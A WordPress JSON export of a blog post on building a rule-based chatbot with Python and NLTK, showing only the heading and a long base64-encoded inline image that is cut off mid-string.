{"id":4543,"date":"2024-05-08T07:28:29","date_gmt":"2024-05-08T07:28:29","guid":{"rendered":"https:\/\/www.2megy.com\/?p=4543"},"modified":"2024-10-30T05:51:17","modified_gmt":"2024-10-30T05:51:17","slug":"how-to-build-a-rule-based-chatbot-using-python-and","status":"publish","type":"post","link":"https:\/\/www.2megy.com\/?p=4543","title":{"rendered":"How to Build a Rule-Based Chatbot Using Python and NLTK Medium"},"content":{"rendered":"<p><h1>Building a rule-based chatbot in Python<\/h1>\n<\/p>\n<p><img decoding=\"async\" class='wp-post-image' style='display: block;margin-left:auto;margin-right:auto;' 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rFZlXcCfUkp9U1Rppaj+CkzjSJY58w\/4xZDnYyuCdcKbb160VrAP0G2rsU284fABKmNuf8AW6xHLr7IHaOtGWVP1DSyoTsgCds3SXWagy4n8YejrUpKf9JIjJiudJNpFUDPwHyIB+apwq8uGwL0tOX9Nr9tzstJDgTiUB2VJ46PtlTSvrCiIjqlDw8sxu6Rc152DVi5RKvVqDUGCA622tbKvPY60eFpPBKFpKT4giN8bqsW8ZjN724mgT8ycOVq2pNDbZV07x6nbkMkDqr0csk+sQlSuI2QklAydR1H2\/dQoESYaTmJJdVi1e1WmqkuYlapRZtwtyVZpy1OycyeoAUQFNuY5LTgS4PFOOYjJ3JzlPI9sXmvbIN5hyEQTDd6kniHd2vG4pwDGNZHgcxUiCdxyfGFIA6wg84aokmCK5FceOOYnejuil7a4XE5QbNlmUolUJdnp6aWUS8o2ScFZAJJODtSBk4PQAkQJWD1PEdc9m5qeuHsj6sWpYqVLuxc2XHpdg\/yh2UWyyNqcckKQiZQE+J3DjdGsutVJSU2\/FoSQMnlk4z8FKjEx2NqdU2KlLWF2gLMuSt0xlbztLAEuSEDKsO96sdM8lIT0yUjJFa6eaHVLUGwr\/vpu4JeQRYEmZuYlVMd6ZsBt1ZSlaVAJ\/miM8jnMQiiWvdFw1Cao1t2\/VJ+oSbTjk1LSzC1OstpSd+9IGRwCCD9XPQ9Rdjabt+Q0S1ynLqpr8\/RpaltuVCUYc7t1+XTLzRcbQrIKSU5AOeCY19bUVVBTOk7YPOWY0GcE4Pny+qKhtDdIJzXC\/kWFIV1qkurk35z0l6XLycN7fV2hSeTu658OkQquUt2i16o0IvJmF0+dekytKcby2so3AeGcZx7Y7b7Jl3dnCr6vsyWmWldwUCtqpk0oTk9U+\/aDQ2b0bN55PHOPAxU3Z20qZ1L7UVXnKwyFUO1azO1me38IUpuZWWUKzxguAKIPBShQPBg28ObNM6UFrGNBAOM518fgi0OrvZJvTSDTSl6lVetS041OqYROyTcspC6et1OUhayohXrepnA9YjziNaQ6PWvqZT52crus1v2c9KzKZdqWqLJWuYBSDvT66eMnH2R3DQrcrmoVy6o2tf+oFi1u2dQGymjU2mV30qaklNN7GlIaLaQkhDaHCUk4W3u8zHzmqtAqVo3pNWtWGtk\/SqkZSYSR+EhzBP1cZEWrVcai4wvikfiUaggDgfA9OBRdCXv2K6Hp9uYurtF2tIThlFTsvKTEiptx9sZxtBe8SkgHziOab9laWvrSGn6vXBq\/RLRpk\/NOyiU1GSUpKHEOrbwXO8SCVbCRxEx\/hEsHVO1h\/8Ahdn\/APfeiW2XVtMqL2DLfnNW7eqdZoXyhmUGWp8wGXu+M5MbFbipIwOfGMb0+ubQxVHaEukIGgGnHOB4+KlUvqP2Ta1aOn0xqlZuolu3zbcgsIn36WShyWyQNxTuUFAFSd3rbgFA4xkjRaJ9mq8dZ5KeuRFXpltWrSyoTtbqiiGkqAyUtpGN5GQTlSUgH6WeD0pbszplqd2TNSLe7P1Cq9ny0iDO1IVVImBP7EhxTYe7xYAUhoJOMFP4vPMPumSq92fwfdltaasTExJUerLXc0rKklwBLkwpa3EDlSQ8tp3HkpC+iciuO7VZjMTnYd2gbvEDLQRnJA0yeShQut9jCpTVrT906Q6r23qMmkhS56Tp7ZYmUIGfoJ3uBZ4JwSnIBxk8GJaO6A2zqpRG6hU9brctWpPT5kWaVPS5cfdOEbFJ++JJCiogDHh4xOf4PilXpNa4ouOi963blOp821XprkMONKb+9MlX0Svvu6XjqEtqPAJirpaapU92m1z1AU2aTM3869Id2MJMsqoqU1geWwpx9kZbZ6wyy0nbZLQHb26PHQ8kVi6mdj2gaWylTTXu0La\/3Yp0mqcTSFySmph8bSUJTl04KsYHEc0rXtbUseAJjpL+ECJ\/jIVIZ\/oiR\/8A0qjmx8FTa0p6lJAjPtMk81Iyed+8XAHgBjPLRQrX170DqGhL1stVG5Zerm5acqoNlqVUz3ABT6hypW76Y546dIbWtA6hR9AaRr0u55ZyUq9Q+56aaJVQcbO5xO4ubsH+aPG0dRF1dv5t6oUHSS95NsvUSat4tJn0JyyFqSytCSvoCpJyAeuFeUJqjKzVvfwe9gUyuS7knOz1fS+xLvJ2rKFGacCtp5wUYVnyUPONbBcqh8FOd\/1nvLTw4ZKKD232QAqxqJfWq2sttaeS9yoS\/SZWfYL777KglQWod43t4Wg4G7AUnOCcRB760KNmar23plKagUK4GrofkG5Oq0zc40hE1MdylTiM4Cgcq2hZ4xyM4FxDtBaU3VZNn2L2s9GayFUemMt0O4pElt5coptAD20ltW1SEtFWwuJUQDtBAjxamaBWvorrxorVrHrk7OW9edcpk9ItTyCJmX7udlCQvIScKS+2QCAoELBHEU09wqhOY6l5DjvEDdbunGow4a8BzUqtbr7OdStbtCSPZ\/duqWmJudmZOW+6qZNSGkGYbSsEtbyTt3Y+lzjwjVa\/6AXj2e7tRbdyuJnpObb76n1VhlSGJtHG4AEnatJOFJJJHB5BBjofV0Z\/hJaD\/wDm1F\/\/AIzcW5qNdlk696lXz2S9TwxTpxt5qZtKsNpHeIfLCVFGDwXElSiBnDiCpJwUgqsfzmqi7CQ+s0xhz9PEZI+3RFxDrroHUNDZGzZ+o3RK1VF4UxVTaDUqpn0ZIDRKVEqVu\/nhyMfR9sT63uxRWGbPk7x1h1WtvTSXqoC5CWqbZfmVowDlaN7YQcEHAKiARnB4i2e2jKUyz9ROzrI3g7Lu0+hiXbqq9pLSpdiZkQ+cEZKShK+MdIr3+Ebo94t6ysXZWA87bE5S5RqizYG6VbSAS41u+iHC4VL8ylaOuOLtNcqusbBGH7peHEuwNcHAAHBNFVeu\/Z6q+ibVGqyLzt+6aBcKXFU2pUx8BTuzG7c0SSBz9JKlDwJBwIqI8ZMXjqxodQLD0B0z1SkqlU3aneIJmpaZI7lkd2pf3sYBAz5k9Yo1Ubu3TGaDJdvEEjOMZwccPBEhPjDTzCqhpzGeoSE+EMJ8IVR9sNgiDwIYeIUn2wwkgZJ4giQnxj3UGgVm6axK0C3qXNVGpTrndy8rKtFxx1XkEjnzJPgBmNrp5p5deq14U+xbKpqp2q1EnYnJDbTY+k66r8BtIIyrwyBySAeu3JOl9nO2H7N0DdZql0TzXcXBfhbT3hOfWl5Ec922D1UCeQD6xG4c7tBtFBYod4jefybz+PgrkcfaODc4Ve0zs56V6O09qrdpe53p24XG0utWNb76VTCMgEJm5lJ2tHzCCMDO1So2kx2q7opFJNtaPWvQtN6IE7Us0aVQqZWOm5yYWCpSyOq8BRPOcxVU9aFfDzlRnHC+46tTjrjrm5xxROSpRPJJJJJPUx4fuW+gkJda46jcI+btpNq9ob08iQljDwA0XZ26jtkIBc4Od4r3Vm6q3XX3Kpc9x1OpPJQVOTM\/OOPrIHJypaicRzxe+pNWugGSZaMpTt5KW28FavAbleePDoMmLH1WnZyiW13PAVPqLIwc5RjJP6cD7YohyYBRt7talpA3Doc55MU7MWjeDq2pbl2dM64WLf7pqKaA4bzxjVa5a2kOlRaSSSeT4Z\/9dIk9laxar6ZT4qOnepNzW5MpVvIp9RdZbcI\/+Y0DscHsWkjziJsOFE2or3tJcGBycE+H6eOYyqdZmmlB1W1W0kZOCCOf0GO855AXJ6rrSh9vheobMvbvao0joWpEikgfdiSYRTa5LJ8VtPNbUqPjs9RKsYJxElq\/Z2s\/Uu35jUTsnX0u+qUw13tRtqbQli4KUnxKmeO\/SMgEoGeBjeDkcMGbel3W5iXOFIJII8\/EH2RJLGve7tN7ikr1sW452h12QWmYlZqSdKHEnxHkpBwQpCgUqBwQRG2t96rLa7MTst6Hh+3wQaq4bWvGv2RPzTLLDb0nOJMrVqTUWiuVnGwcFp5o4wpJ5SobVoUApJSoRsbktKjVKiLvvTx512ktkJqlKfUVTVEdUrancr\/npZZI7t8YOTsWlKgCu3bWuWxu3nTphhyn020O0DJy5cShtQZpt5ttpySB0amwAoHI5wk7inPdUhTKpdul13uONS7tOq9MdekZ6Sm2QUOJOUPysw0r1XG1pKkqQrIIPngj0e2XKG6sM0Bw8cR\/n1Q6KOhalDkkAeHlDFxML3tyktyEpfdmpJturuFtcsVlbtIngMuSTpPJGBvacPC2yPw0LAhqt3VQxnnEbiOQSNyFCMmGlWYVJ8xDFKGeBFxFcuQOsSTT\/Ui9NLbiauixqyunTyEFpZACm3WyQShxBGFpyAcHyBHPMRo5PhDVKCSM56fri3KyORhZI0Fp4gqRqcLoOt9unXirUpynSs7SKW7MIKXpyRkEomDxjIUSQD7QIrG0tY71sq2LutKkPyy5K9pdUtV1zLRdedSUOIJSsnIUQ6vJ5OTmIOVp4CVAk+HjAcq27Uk5OIxI7fQxsLWMABwTpxxw+andPAjClWl2qN1aQ3Wi8rPclUVFuWdlQZhnvUbHMbvVyOeBG1t\/Xi\/bVt+8bdoTsjKt3248usTSZb+UKDgUFIQvOUJ9dzGOm9RzFf8Ad46rSD7TDNzAHLoJ8hF2WmppXF8rRrjOfDUeSgDJwFsbUuitWPctKu225oy1So803NyrgHAUk9FeaVDKSnxSog9Y2eoeote1JvSav6vsSSKtOltUyqUZ7pt1TaQhKinPXalIPTOIi6nEZOMYHthpXlXhj64nED5e0ON7GM88fX4Kd0jj\/nVTjVnV68daK3JV69Vya5qQkkyLRlWe6SG0qUoAjnJyo8xM9NO1lqzpXZ8pYtruUb7lSbrrzaZuRDygpxalq5JGfWUceQ4ikgvPAwT7DCrcAT15i2+jpXxCJ7RuN4DGgUeJV06idsDXHUi25u0KvX5KSpM+2WZtmnSaWC+2eqFK5O09CBjI4OQSDENJ9etTdEp2ZfsOuBiXnCFTMnMNh6WeUBgKKD0UBxuBB88xACo7c5zDHHG05BOCOucCHoNJHEYdxoYeIwMeCkDKvPULtoa4ag26\/ar9TkKLTp1CmptukyoYW8g\/SSVklQCsnISRkcHqYpWhVabt+syNdkO79Kp003NM7k5SFtqCkZHiMgcR5PVPJV+jmGk4zweD1xFUFLT0rC2NoaDx8VA1JCl2qeqV06w3c7e15KlVVJ5huXUZZru0bGwQn1c9eTEPMPJG0Yyd3TiGHxwQecDzi9HGyFjYm6AaD3JyV1aV9sDWXSW22bPos9TqjRpUfyWVqUr3wl+c7UKyFBOckA8DMQ7WLW\/UPXOry9Tv+sImUyLa25OWZaDUvLpXgrCEDxO1OVEknanyEQM8QhHPsiwy30scvbsjAd1x\/nHmoJxxXQtsdu3Xa3KLK0KafoVZZkENtyzs\/TkrdbCBhPKSkEgYwcZitrz131J1A1DpWp12VdE9WaHMy0zTkloJl5YsPB1CEtjjbvAJ8T4npiAcEqweQOkMU42lW0uJ55HPhFEdBRwuMrGAE88f5xVWCrEr2u9+3Fq9K621JyR+Uso9LzCFty+1jeygIRlvPTCRnnmNJfept16g39M6k1qcEtXZl9qZExIgsd080EhtxGDlKklCSCDkEZiKuOJSOTgeJhgUOuQfti6ylgY4FjQCG4GnAdPcoVh6xa86h66O0R+\/pqTmXqDLuy0u4zLBpS0ubCouYOCSW0np4niJlp121dc9NrfYtSSqtPq9JlGw1KsVaU9IUwgfRQleQopA6Ak46DgRRKlpHrFQA+uMZWk9CP0xbdRUT42wPaN0cBj6fFAM6hWVrJ2idUddnJMX\/WGHZSnLU5KSUrLJZZZUoYKgByTjjJMVlC+JB4I6iG5jJhgjp2iOJuG+HBRlIRiEJGOsClp8VAfbGPdnOVD\/AIRc3mh27nVSRz5IPWEyIIargRPvUJpMZJaXmZ2aZkZKXXMTEy4lplppO5Ti1HCUgDqSSIxRf3ZZoNBtSSu3tNXrKNzFH0zk0uUmWdSNk5W3lBEqg5+kEKUDj8ZSDkbSDhXCtZb6Z9Q\/+nh4otvqZcP8UbThOilpTTPzl3fKNzN8Vdj+cpkq4nc1TGVDkEpXlasjxIHrjZTdJ7RdcpFLYpDtPLzcsjYnJwcRALguCt3hcFSui4p52dqdYnHZ2cfcVlTjziipR9gycADgAADgARY1M7P1dqdPl5006dAfbS4ClIIwRkR4ZcK01kzpql2S7\/Pop9b+lMc7QcvUE7J62Q6PIqjONadOn0tfdXTouraG0EKxkfpj2SvZpcUSZp+eYV5KlsxtZPsjXDVJZc\/JzE0uWbVtU76MopB9v2RrXSQZVbWycgqk1ouyzLrl6K5ZVDcpZaQ8H23ed6iUY28+BTz9YiqWaO876NMSye8dmCg7EoyQMcHpz1P646J1Y7M922Fp6NRm5oTdNkJtLM00lkhxsLOEueRTuGFeIJT7cWh2EtB6Zdc\/M6p3PK99L0d9MtSZQp9UTASFOOrz125SE+3PlFqou1PR0xmbqBp7ythS2yeombG4anX4KC6Sdie479lGK7dEymQlnkBYbcaUleD4DI+rJxxx1i0q12BrCm0IZp89NSbp\/nlL27FDP4ODnJ+v9cdh19m5ZMpNJZpIQOcTMwWyfqwCPONPJXHRai6uk12nTFOm0gfSUFtKycAocTwR9eDzyI82qr7cZpO1Ehb4DgvRqO02+KLc7MO+ZXBl+9gl2jtd\/bVQRN7wQhl8lBB8NpSDn7Y5m1N0fvPTKfDFfpjzKADtc2EI5J4Bj7O1C20utYVMoS2keqT4eRjnbXu1pOcp0xTKumWmhMo\/k5WAvCgD0z\/w8I2Ft2or6eYNqTvt+as1+zlBVxF0HqOHkvltSp+p0qrSNWpFRmJGoyEy3MSk1Lulp2XfQoKQ6hYIKFJIBCgcgj2R9Lda9Jbl120KkNe5+2zKaoW7TmflmxLM7RWZJCMJnkpSMKdQkJ34GdqSOQhEfPqlWTXKpqjJ2Jb8mt6rz1XTTZZpsHl1Tm0KJGTtTncTggJBJ4zH3stKSNvdw2lAWyhHcutlAAcaxhScfVHq9Ld5bdUxVMR05jqNNF5mI8FzTxC+OWntx0mmTc1b12pcdti40Ikqp3asLlTu+8zzX\/SMLPeY\/DT3jZ4WcaK46FULXr8\/blVQkTdNfVLulByhZB4Wk+KVDCknxSQYtvtdaJt6F6z1a26bJbaBVAKvQlpSNplHifvY8i2tK0Y8kpPAUIh11uJvOwaDe6ZbFVoqxbVaeHKpptCN9PmV\/wCd3CVy5JJJEm2fGPa6eoZO1tTEcteP+vssf3qBEnzhh46wqickHPXxjPLhop++EZjORXACk+MW72eZSTm3LhEzLMuFKZLaXEBWMl\/PX6hFP5A58ouPs4kl25QAM4kuP7ePK\/40SPj2NqnRkg5ZwOD+Jq6nYxofeIw7hrx9xXqt\/Uq3bvuFq06vp\/IobmnVtIc3Ic9YBXVJQCM7TyDkRGawZLSvVMBtkPUh5CFuMLAc2MuZBAB6lJSSPPAEbpnUnSq2p16oUSy5j7opKwlaQlPOSD6xUdufMD7Iqy6rlnLsrj9cqSAlyYOA2nlLaAMBA+z9ZMcjsfspV1dzlEdHLS2+WEteyR5O+88HtBJLcdcrb3i6xRUzS6VstQ2TeBa3GGjkdACrM1G0serV0U2p2i20JOvFPeqaT97YVjcXePwSnnHmCPEQ3Um5qFaM\/RrRoVPlZhFEdYmp0EJBcKCFJaUvB5IG5X1iJFopcFSmNO6gt90OGkPPNy5V+IG0rSk+wFRH1Yjn6cnpmpTT9QnnS6\/NLU64ojqonJizsTa7lfrxLaL1LvwWvMbQCcyOfndc8513Wae\/VV3urp6GkbV0Td2Sp9Y8PVxxAz1cujtNb2p2oDk8hdnycgJNCV8KS7v3Ej8ROOntis7\/ANUZa4qfPWzL2fKU9XfhIm0PhShsX+KG09dvn4xvezcf5dXM8femf96oqWsYFXn8J6zTucePrmK9lNj7RFtxcacMduUwhdGO0f6pcMn+o515HIVN1vFW6x08u8N6TeDjgajPDgrovyhLnNHbfNFoi5qdUJNS\/RJYuOFPcq3E7Ek4ziPBoHbNQlKxVzcFtzUuhcs13ZnZNSAVbjnbvSOfqiT3DeFWsfSW3q1R25dUypEpLqEwgqTsU0o9ARz6o8Ybo\/qXcV+VWoylbYkkJlGW3G\/R2lJJyog5yo8cRwMtz2kbsbdY6eJjqXt5Mydoe0b\/AKo4NxwzgcRoSt8yntxvFKXuIl3G+qGjdPqHic\/oqnt6zfltqdO0EL7qUZm5h+aUkcpYQ4RhPtJKUjyznwixbg1KsfTKortW3LLYm3JUBE2pCkspSrA4KilRcUM85xjz6xEtOrokLb1bqYqrncy1RmJqTU8eA2svbkFR8BlOP9YHwj26k6LXTN3bPVe3pRM7K1J5UyR3iULaWvlYVkjjcVEEeBA9sdreH0Nz2iprftZO6Oi9GY6MF5jY+TA3i5wIy4dCeC0tGJ6a3S1FqYHT9o4OOA4hvLAPJba5bWsvVCx5q9rRp6adU5NK3XW220o3qQMrQsJ4J25IUPL6xGPs502l1GkVxmoyLE0lb7aCHW0q9UoORz0jZ02lI0e0pqKLimWfuhU+9DbKV5CnVo2pbTn6RCRlRHA58snW9nUn5N3JlPq7kjr\/ANGY5Wtrah+xl3p6Kdz6SOeNtPIXHO7vDIa7OXNacY962kMMTbxSSTMAldG4vAAxnBxp1KjV06arsfUWiqlWVO0SoVFoS5UNwaJUCWVH2DOM9QPYYydo+UlpO66Y3LSrLINOyoNthIz3ixnAiV6Qahy12yabIvBaX52VUlySee5L4bIUnk\/84nGc9SPtiN9pBh6dvWiycune6\/IpaQAcblKeUAPtJEb7Z673k7b0FpvwImp4ZQX5O7K0gFj\/AH4znx8lhXCko\/5JPV0GrJHtIHNrhnLfPh4Kmyow1alH1c4BiVX1ptcVgJkV1sS6kzqVbFsOFQCk4ylWQMHBH64iaj6pOY+iLddKK80grKCQSROzhwORpkHHxXnlTSzUcpinaWuGMg+OoXVtX02ot8acUyniVlZWdFOYdl5pLQCku9yPpEclJ8frz4CIX2ebcepdfu2j3DSmvSpJMq2pt9sK2nLvIJzwRg5HUYjdalXLVrS06smv0Z5KJiWekjtVkpcT6I5lKgOqT4xOLHrttXjIfLSiS4amp5tEvNhRHeILeSG1Y6lO84Pkfqj4vku9\/tWylU2QmSkqZXBrsnMUjJASCej2jrxC9mZS2+rusRbhs0bQXDH4mln1BVBaMS0u\/q+uWfl23Wv5b97WgKTwTjg8RH9ZmmpfUqtsMNIbbQ8nalCQAPUT4CJJon\/8ZljxPp3\/ABj1apaV3\/Xr7q1WpFtPzErMOpU26HWwFDYkdCoHqD4R7dFeqW1\/xA3q+cRsNHHjfcACd49ea4l9JLVbP4gjLnds7gMnGAtN2e5eXmdSWWZlht5syT5KXEBQ\/B8DE\/uzWW3LZvCctKp6cSE1JyrwZemErbKiggZV3ZaweD03c46xEdD6JVrc1fFHrMmqXnGZF7e0VJUU7kpUOUkjoYl163vo1b951Bys2S7O1mTfClvdylQccABBG5ePLwjl9tRBeduHtFNJWMNKxzBE8jBLnYflrgMa8dRqtnZnPo7ICZWxO7Uh2+0HIAHq8D4qIdoXT6hWpO02vW7KplJep9427LIGEJcSAQpA\/ByCcjpwMeMU6T5nETbVLU2oakVhmYckxKSEmlSJSXCtxGcblLV4qOB7AAB5kwlIQtxIdJSgqAJHgM9Y9q2DorratnKeC+EmdjTnXeIGSQ0nmQMBcbfpqWquUklCPUJ05A8OXTK6N0vpzdN0iYuLT636XWrmef7uaM1glCu92qQeQUgI2naCMg7uehiPaTpluyFWo65KQkpOszEsXKixKJAT4bVKA8chXOMkDJi1a2i6rBo9uS+klpylSpgUHZ9De0LfQUj1t2Ryrk7+cEJ4wMH03Jp7a8xR69drNjMzVaqUgXVSj+1SxMBBxjOQleSNxSedsfMtn2tFs2oZf6kl0U0su4A8GQ7zgwMmBOGNYPWaN0+\/p6XW2j0m1mgjADmNaSSPV0BOWHGSXHQ6rjsmGqORB9E7FhQUCU+3I8xEsolhy07b8vdNzXbT7cp86+7LSRmmXnnZtTeA4pDbSFHu0KUlKlnAzkDcUkR9julaxoJ4fNeOOGpUPUraeeEgZJi9e0iH9Muz\/pDoky+pqbq8u5ftfQMoUqYmQUyja+f+aZUpGDwSkHqBFbzundVpN80a0qh3E41WlybspMyi+8YnpOZUA280rAO1QKhggKCkqSQCkiJh2862mrdqi6Ka1t9FtuWp1ClsHjY1JtLUPZhx1wY9kcRtrWA08UTDocn6Y\/VUqjpBKlrbSSTlaR19sfR22acGrVpDZQPVkWR\/9gj5zU5OZlhPTLqR+uPplQ2MW\/TUZztk2R9fqCPIq4nAWVTjJXgMi2VDLY9XpF16MshNvzASAAqZVny6CKoW1tPT7cRcWkDQFrqJ4JmljPicAfsjVsPrrYMa08VA9UGmLmqE\/p5VKYFyFY79lSVNAImUhBSGUL6IXnCwevqZHmIb2ObPVaGglssDKpqfZXUXvVwSt5RVg\/UMD7ItvU+kpoUlUbpmpBE0xJqVUmStO7u30IUUqTz6uOefrjV6Vy7NHs6jSDKCGmpNtpsHqEAer+qOOqTI1z4Xc3ZXex9lJC2aIahoH3UX1IsU16Qn0yNcrNFqE22loTMi6QpG1W4EDIz5cnpGlsS1J+g1Bzv5R1UipiXQnv31OOKcQnDjqyeql8KOPEn7LlqC5VfquJ3EnPAziItPz5ke6cNPqs88HQky8ky2fUP4ZK1JBA8cHPsjBcHPAhDtFsqeZoHaEHKp7WS+K41XUW7KzRlJd5CUpIJAJKtpzjkAA5zFIOuWFctNp8rP2tcVArFSmHWJOdnXnGJtE0ylC1FTSnFjZ98A3cAkKABxkdI6q0O3q9d9IlJIBbqG3DOBTZ9VCyhCOcYzuI9XrgmNBWtOpSgtomFSbS5lkFUu6UEHHsGcDw6RFPI2l3mublx55\/RZMsRlja5pw3phQbsIdmKvPawX7rzVENsyVMqM7RrfW4nKnpjIEw+nyQlILefFRWONpz3UqmXhLJKT3DwxndtIMV9pNqfb1mad0W3BIuNqYaU44A3jLjiytSiPPKiTEvOu9snhxDuf\/pmPTGzh7G68AB8gvIpnYlcepP1XOP8ACOWHM3JojQb\/AH5VIn7Sqwk33ABkSk1hAyT4d8Gk48yI4R0wlH63LXbYJTh+qUGZqUgNmVGepqVToCQeNy5dmbaz\/wBJxH1P1trtuazaAam2XJSyn5lNsTlQlWlo6zMsnv2CPaHW2znqMR8odGKy\/R9U7OmmX1IaXXJFh4dQWHX0tvJI\/wA5pbiT9cey7GVZq7Q5mdWHT6j6Fa6T8ShiiFneDwo5hVsgL278jGciNjVJOVp9RnKYuXcbTJTDsuFp\/wAxZTyPs848ZlUucsTTRH+crYf1x3YO8MqzqrbOQkgdfCNnQbruC2FTCqJU3pUzOwO7MeuEZ25yPDcr9Maw5PQcxJbGsCqX8ueTSpuWZ9ADRc74nnvCvGMD\/MP6RGm2gq7VQ29816LRTjG9vDI8M\/FbC3xVU1QGUed88McVF1LUtSnFk5USTnzMMUCekWg\/2fruS0Vs1KmOKHRPeKTn9KYrqt0Or27UHKXWpNyWmW8EpUMgpPRSSOCDzz7DGFZNsbBtDIYLXVMkeB+EHXHXB1wrtdZ6+3t36uMt8SNNV6aVd9xUOQmKbSao7Lys0oqdaSBhRKdpJ+wCNMOm3y6RubUtepXhWGKJS9gceCllxediEpGSTjn2fWRHqvexqvYM5LytXW04JpoutuM5KTg4KeQORx\/3hF5tyslFdnWyN7G1Uo3y0aOcACMnrzwqHU1dNSCpcCYmHAPIErwUO7K\/aynl0CpOyi5gBLpQAdwHTr9ZjUuvOPuredVuW4orUo+JJyTEwsjS+tX\/AE+YqdKnZRhuWe7hSXyrJVtCvAHwIiRns6XX+WaVz09Zfwxo6\/bfZCx3GWOpqI46g4D8jBOBzONcBZ8FkvFfTsdFG50euOg93vVfz93XJVqNL0KpVd5+RlSgtMEDanaMJ9vAJjFQbqr9szD0zQam7JOPoCHFNgEqSDkDn2w+7Lcm7Qrsxb0+808\/LBBUtkkoIUhKx19ihEkt7Rq6LjtlNzyjss2y62440y6VBxxKSQCBjHrEHH2HoYzay5bMW62MlqnRspqg6ZA3Xl2oOPE66qxDTXSpqiyIOMkY1xxAH6clBJmZemph2YmXFOOPLU4tZ\/CUTkk\/bEipWpd+USVTJ0255xLCUhKUOKDgSPIbskCIwrcCdySCOMGDJEb+stFBdIWw1cDZIxjAc0EDHDGcj5LAhqqimkL4nlrueCQvbW7grdxTAm65VZmeeAISp5ZVtHkkdAPqj00O8rltqVelKHV35NuZILwQAQs4x4jy4iTWfotdt405FYaVLSEo7ksrmSrLqem4JSCdvkT1jHfGjtzWTSTW52ap8zJtrSha2XSCFKIAASoAn7P2xyo2n2QnqBs8JonO3t0RADG9yaOWR045W1FtvEcf8x3HAYzvc8HnrrhQeVm5mSmkT0o8WX2VhxpaDgpUOcg+ce+s3VcFz1CWnq5V3n5hgBtt8gbm05zkYx0JJj22bYVy33NOS1BktzbOO+mHTsabz0BJ6n2DJxz0iaz3ZvvOUlVzMrUaZNuJG7uULWgn6ioAfpibztVslabg2nuVREyoA3RnG80Hln+ke9U0NqutVT9pTRudHnOmcEjnjmtNrJqBJX3VZBujvTC6fS5YoQp9G1a3Fkb1EfUlP6Irs7sbk45yMGJNbNjVi47qcs9tKZGoJDhcTNpUkoKBkg4zgw2dsepSN7psFyZl1TvpLcsXQT3e5aQQfPHI8IyrJNYNnYm2GilA7JnaYzk7jiTvnAwQTk5CtVsddcXmvnafWdu54ajHq49y8dZvO6a7TJWi1SsvTMnJFCmGVgbUFKSlOMc\/RJH2xjt28bmtIvKt6tTEiXwA4G8YWAeMg8efh4xZSuzPd4Ofu3SccfhOfDEJ1D03q+nDsg3Vp2UmfT0urQZYqO0NlOc5A\/HGPtjWWnajYu+AWe3SRSb5J3ANCRqTjGOWVl1dsvNHmsqWubjA3s69Fo6PcNaodV+7VJn1ys\/6\/wB+QBu9f6XXjmJArWbU1IwLtmzn2I\/ZGe6tIblta2ZW63nZaak5lLa19wVFTCVpBSVgjpzjI8Y8GnmmtY1JeqLNHnZVhVOS0pfpG4BXeFYGNoP4h6+yL1XW7GXWjdeansZIozuF5aHYwcBuoyNToPFW4orzSziij32vdqGgkZ0znj0C1yL7uxm4V3U1XH01VxHdrmQE7inaE46Y6AD7I1FVq1Qrk+7VKtMqmZyYVuedVgFR6ZPHkBDm6bOzNU+5ElLrmZpT\/o7bTSSpTi923CRjJ5i0pDsx33NSofnJ+lyLxG4sOOKWoewlIIz9UZdzvey2yLo562SOBzmhrToHFg4AAa7o8NArVNR3W7hzIWueM5PTe8fEqnyo9IYo54PT\/jEovrTq59PpptmvSY7l\/d3Eyyre07jqAfA+w49mYm9P7NF41GQlKg3WKShE2yh9CVKcyEqSDg+r7YvV23OztvpIa6pq2CKbO47OQ7HHGOiogsdxqJn08cRL2fiHMZUJomqN\/W1Jop9HuebZlWxtQyohxKB5JCgcfZHkmNRL4m3puYmroqDi55lUs+S6cKaPVOOg+wDxiT37ojcVhUFdwVOpyD7CXUMlDBUV7lEgdQOOIrQnwiixs2XvzX3O1xRSZOHODBqRg6nGcjQqqsdcqAtpqp7244NzoPHGUE5IwMBPmYs6x2ra1SpNC00uKt1ChVGgIqkzTp+Xp6Z5p6TDTs6+w40XWilwKadUhYUQd+0pGAqKxBAPPlEy0ZmES+qNAy3vVNOTFOTj8aalnZZP63hHTVTMxFw0I59NFqApTaVy0e7NdtM5SgUuYkqBQ52k0enNzSw5MONImu8cefUnCe8cddecKUjakLCBnbuMQ7Ur8xNdpnU92ZBKxdM+gZ8EodKE\/wD2hP6o1lg1Ndu3zblWSAlchVpR5YP4JQ8kn9GDE77bVBVRO1Xf6Ep2sVKalqnLqA4cRMSjLhV\/31LH+rHnu2sPZmDd4YP3TiqdpDRdqEqnH0n20\/VlQj6d02XLNJk2cfQl20588JEfM63GSuuU5k+M20D\/AN8R9P22tku2kDhKEj9QjzGuI0WXTYC8LyMg8dIt\/SZJTaiF4+nMulP6cRU7mMKSR1ixKTe1taaaSO3ndc8JWnSJddWpI3KUoqwltA8VE8AcePgDGsgY6STDRkrNDmtBJKk+pcs3ULdk5WYSSw9N926n8ZKmXAR7OsVRpXPBuifJmcnFGfoX\/s58YwcN8IWB5KTtP2xk0\/7Q1C7Q9qtVi2bfq1Kl5GcdamGqmlAdDyfVG3YpQKcFXPj+uItqCKratVF6W7JqmX0NFE7KJUQZppI9Up8N6fDzHHgMcteHn010fMYC7izR\/wDhNJ55PwU6uQ1lDzc3TKaaglPqFKZzuFJHGSnIKVHqcEjpjPMaCo1KooIc7ityrp6YAdSj6wkZjT6X9oazb9QpgTzEnMocLSmXFchQHQjwPhz9USK76h3TSnZGvSSH1+q0ypxILqvAc5\/3RrTHuH1gt1Sytc4DTCoe6b1cpt5Jn5Cdl52bSENvU4kMTCjuJKkJUeTjJwRziLGlp2v6nV+mUi3KQqdfQphc01jHdtbgVFw5wlODg+3IEQO5hI1y5KW5ctGbqE+2+luTlWW+9cdf3YbQ0gAkqJIHqiOzOz9pPNaf0OaqtfZbRXKwsOPoThXo7Y+i0COCckkkeOBzjMbKz2r+ZVIDQQwcSsC\/XhtviIbq46ALI9bbC+DpI2f9F5MaSq0GnMK2u6TvJJGfVXn9Yi8dvtjWVQZcHU+r0j0CspBTxbzSvLojvuwVTchT6a3SrlQ3ZcxSw5b8+hbrispKS0cp\/wDXlHx20xtOqV6dbq7FSk6VTqB3E5UarPvd0xKp7xIRyAVLcWrhDaEqWog4HEfavWqttWhopqFdTygPuba9TeRk43LEsvake0qwB7THxksms2x8kq3p7dNQepUvVJmSqMrU2ZYzCGZmVS8gIebSQrulImHMqRlSSlJwoZB9J2A347fM9vMjXzzorU4DXEJ2q9rv0euzdyUyoyFUti4qhOP0ypSDxcaWQ7uUy4FBK2XkhbZU24lKsLSRkEGIQFADrE